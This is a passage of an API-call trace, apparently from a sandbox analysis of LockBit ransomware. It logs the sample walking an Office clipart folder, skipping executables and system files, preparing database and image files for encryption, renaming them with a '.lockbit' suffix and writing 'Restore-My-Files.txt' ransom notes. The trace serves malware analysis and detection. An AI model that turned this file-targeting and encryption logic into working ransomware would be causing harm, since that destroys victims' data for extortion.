ReadFile (in: hFile=0x170, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0172.524] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02758U.BMP.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02758U.BMP.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0172.524] malloc (_Size=0xa6) returned 0x1fa2ed8 [0172.524] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0172.525] free (_Block=0x1fa2ed8) [0172.525] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02758U.BMP" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0172.525] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0172.525] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0172.526] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2322a600, ftCreationTime.dwHighDateTime=0x1bd4e52, ftLastAccessTime.dwLowDateTime=0x5a425410, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x2322a600, ftLastWriteTime.dwHighDateTime=0x1bd4e52, nFileSizeHigh=0x0, nFileSizeLow=0xa0d2, dwReserved0=0x0, dwReserved1=0x0, cFileName="PH02759J.JPG", cAlternateFileName="")) returned 1 [0172.526] lstrcmpiW (lpString1=".", lpString2="PH02759J.JPG") returned -1 [0172.526] lstrcmpiW (lpString1="..", lpString2="PH02759J.JPG") returned -1 [0172.526] PathFindExtensionW (pszPath="PH02759J.JPG") returned=".JPG" [0172.526] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0172.526] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0172.526] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0172.526] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0172.526] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0172.526] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0172.526] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0172.526] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0172.526] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0172.526] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0172.526] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0172.526] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0172.526] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0172.526] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0172.527] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0172.527] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0172.527] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0172.527] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0172.527] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0172.527] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0172.527] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0172.527] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0172.527] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0172.527] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0172.527] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0172.527] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0172.527] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0172.527] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0172.527] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0172.527] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0172.527] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0172.527] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0172.527] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0172.527] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0172.528] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0172.528] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0172.528] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0172.528] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0172.528] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0172.528] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0172.528] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0172.528] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0172.528] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0172.528] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0172.528] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0172.528] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0172.528] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0172.528] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PH02759J.JPG") returned 1 [0172.528] lstrcmpiW (lpString1="ntldr", lpString2="PH02759J.JPG") returned -1 [0172.528] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PH02759J.JPG") returned -1 [0172.528] lstrcmpiW (lpString1="bootsect.bak", lpString2="PH02759J.JPG") returned -1 [0172.528] lstrcmpiW (lpString1="autorun.inf", lpString2="PH02759J.JPG") returned -1 [0172.528] lstrcmpiW (lpString1="thumbs.db", lpString2="PH02759J.JPG") returned 1 [0172.528] lstrcmpiW (lpString1="iconcache.db", lpString2="PH02759J.JPG") returned -1 [0172.528] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0172.528] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02759J.JPG") returned=".JPG" [0172.528] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0172.528] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0172.528] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0172.528] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0172.528] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0172.528] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0172.529] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0172.529] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0172.529] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0172.529] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0172.529] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0172.529] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0172.529] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0172.529] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0172.529] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0172.529] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0172.529] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0172.529] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0172.529] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0172.529] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0172.529] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0172.529] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0172.529] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0172.529] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0172.529] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0172.529] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0172.529] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0172.529] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0172.529] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02759J.JPG.lockbit") returned 72 [0172.529] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02759J.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02759j.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0172.530] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0172.530] malloc (_Size=0x40068) returned 0x3df0008 [0172.530] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=41170) returned 1 [0172.530] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0172.531] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0172.531] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0172.531] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0172.531] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0172.531] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0172.531] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0172.623] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02759J.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02759J.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0172.624] malloc (_Size=0xa6) returned 0x1fa2ed8 [0172.624] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0172.626] free (_Block=0x1fa2ed8) [0172.626] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02759J.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0172.626] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0172.626] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0172.626] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfcb03b00, ftCreationTime.dwHighDateTime=0x1bd4e50, ftLastAccessTime.dwLowDateTime=0x6cebbbb0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xfcb03b00, ftLastWriteTime.dwHighDateTime=0x1bd4e50, nFileSizeHigh=0x0, nFileSizeLow=0xc5d7, dwReserved0=0x0, dwReserved1=0x0, cFileName="PH02810J.JPG", cAlternateFileName="")) returned 1 [0172.626] lstrcmpiW (lpString1=".", lpString2="PH02810J.JPG") returned -1 [0172.626] lstrcmpiW (lpString1="..", lpString2="PH02810J.JPG") returned -1 [0172.626] PathFindExtensionW (pszPath="PH02810J.JPG") returned=".JPG" [0172.626] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0172.626] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0172.626] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0172.626] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0172.626] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0172.626] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0172.626] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0172.626] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0172.626] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0172.626] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0172.626] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0172.626] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0172.626] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0172.626] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0172.627] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0172.627] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0172.627] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0172.627] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0172.627] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0172.627] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0172.627] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0172.627] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0172.627] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0172.627] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0172.627] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0172.627] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0172.627] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0172.627] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0172.627] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0172.627] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0172.627] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0172.627] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0172.627] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0172.627] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0172.627] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0172.627] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0172.627] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0172.627] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0172.627] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0172.627] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0172.627] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0172.627] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0172.627] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0172.627] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0172.627] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0172.627] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0172.628] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0172.628] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PH02810J.JPG") returned 1 [0172.628] lstrcmpiW (lpString1="ntldr", lpString2="PH02810J.JPG") returned -1 [0172.628] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PH02810J.JPG") returned -1 [0172.628] lstrcmpiW (lpString1="bootsect.bak", lpString2="PH02810J.JPG") returned -1 [0172.628] lstrcmpiW (lpString1="autorun.inf", lpString2="PH02810J.JPG") returned -1 [0172.628] lstrcmpiW (lpString1="thumbs.db", lpString2="PH02810J.JPG") returned 1 [0172.628] lstrcmpiW (lpString1="iconcache.db", lpString2="PH02810J.JPG") returned -1 [0172.628] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0172.628] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02810J.JPG") returned=".JPG" [0172.628] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0172.628] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0172.628] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0172.628] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0172.628] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0172.628] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0172.628] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0172.628] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0172.628] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0172.628] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0172.628] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0172.628] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0172.628] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0172.628] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0172.628] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0172.628] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0172.628] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0172.628] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0172.628] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0172.628] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0172.628] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0172.628] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0172.629] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0172.629] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0172.629] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0172.629] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0172.629] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0172.629] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0172.629] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02810J.JPG.lockbit") returned 72 [0172.629] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02810J.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02810j.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xec [0172.630] CreateIoCompletionPort (FileHandle=0xec, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0172.630] malloc (_Size=0x40068) returned 0x1ff1e60 [0172.630] GetFileSizeEx (in: hFile=0xec, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=50647) returned 1 [0172.630] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0172.630] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0172.630] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0172.630] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0172.631] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0172.631] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0172.631] ReadFile (in: hFile=0xec, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0172.777] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02810J.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02810J.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0172.777] malloc (_Size=0xa6) returned 0x1fa2ed8 [0172.777] NtSetInformationFile (FileHandle=0xec, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0172.782] free (_Block=0x1fa2ed8) [0172.782] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02810J.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0172.782] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0172.782] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0172.782] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x81187900, ftCreationTime.dwHighDateTime=0x1bd4c19, ftLastAccessTime.dwLowDateTime=0x5a425410, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x81187900, ftLastWriteTime.dwHighDateTime=0x1bd4c19, nFileSizeHigh=0x0, nFileSizeLow=0xf438, dwReserved0=0x0, dwReserved1=0x0, cFileName="PH02829J.JPG", cAlternateFileName="")) returned 1 [0172.782] lstrcmpiW (lpString1=".", lpString2="PH02829J.JPG") returned -1 [0172.782] lstrcmpiW (lpString1="..", lpString2="PH02829J.JPG") returned -1 [0172.782] PathFindExtensionW (pszPath="PH02829J.JPG") returned=".JPG" [0172.782] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0172.782] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0172.782] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0172.783] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0172.783] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0172.783] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0172.783] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0172.783] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0172.783] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0172.783] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0172.783] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0172.783] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0172.783] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0172.783] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0172.783] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0172.783] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0172.783] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0172.783] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0172.783] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0172.783] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0172.783] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0172.783] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0172.783] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0172.783] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0172.784] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0172.784] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0172.784] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0172.784] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0172.784] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0172.784] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0172.784] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0172.784] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0172.784] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0172.784] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0172.784] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0172.784] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0172.784] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0172.784] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0172.784] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0172.784] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0172.784] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0172.784] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0172.784] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0172.784] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0172.784] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0172.784] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0172.785] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0172.785] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PH02829J.JPG") returned 1 [0172.785] lstrcmpiW (lpString1="ntldr", lpString2="PH02829J.JPG") returned -1 [0172.785] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PH02829J.JPG") returned -1 [0172.785] lstrcmpiW (lpString1="bootsect.bak", lpString2="PH02829J.JPG") returned -1 [0172.785] lstrcmpiW (lpString1="autorun.inf", lpString2="PH02829J.JPG") returned -1 [0172.785] lstrcmpiW (lpString1="thumbs.db", lpString2="PH02829J.JPG") returned 1 [0172.785] lstrcmpiW 